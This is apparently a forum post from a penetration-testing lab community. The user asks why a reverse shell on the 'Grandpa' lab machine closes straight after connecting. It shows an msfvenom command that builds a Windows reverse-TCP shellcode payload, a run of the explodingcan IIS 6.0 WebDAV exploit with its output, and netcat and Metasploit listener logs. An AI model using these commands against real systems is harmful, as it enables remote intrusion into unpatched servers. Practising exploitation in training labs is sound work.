Grandpa reverse TCP immediately closes after sending exploit

Hey Guys,

I am trying to pop Grandpa without Metasploit. For this, I want to use explodingcan as it seems the most straightforward.

However, when I am sending my payload, I get a connection which immediately disappears again.

msfvenom -p windows/shell_reverse_tcp -f raw -v -sc -e x86/alpha_mixed LHOST=10.10.x.x LPORT=1337 EXITFUNC-thread -o shellcode
[email protected]:~# python explodingcan.py http://10.10.10.14 shellcode 
[*] Using URL: http://10.10.10.14
[*] Server found: Microsoft-IIS/6.0
[*] Found IIS path size: 18
[*] Default IIS path: C:\Inetpub\wwwroot
[*] WebDAV request: OK
[*] Payload len: 2187
[*] Sending payload...
[email protected]:~# nc -lvnp 1337
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.14.
Ncat: Connection from 10.10.10.14:1053.

I also tried setting up a staged payload instead and handling it with the multi/handler in Metasploit. However, the problem persists.

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.x.x:1032 
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.10.14
[*] Command shell session 1 opened (10.10.x.x:1032 -> 10.10.10.14:1034) at 2019-07-08 20:53:21 +0200


[*] 10.10.10.14 - Command shell session 1 closed.  Reason: User exit